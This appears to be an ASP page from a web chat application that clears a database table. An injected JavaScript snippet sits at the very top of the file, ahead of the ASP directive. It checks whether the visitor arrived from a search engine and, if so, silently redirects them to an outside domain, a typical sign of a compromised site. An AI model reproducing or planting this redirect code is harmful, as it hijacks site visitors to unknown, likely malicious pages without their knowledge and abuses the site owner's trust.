d:\wwwroot\wuchunhua\liaotianajax\asp3.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
002: <!--#include file="conn.asp"-->
003: <%
004:
005: Response.CacheControl = "no-cache"
006:
007: Response.AddHeader "Pragma", "no-cache"
008:
009: Response.Expires = 0
010:
011:
012: conn.execute("delete from tt")
013:
014: %
>
015:
016: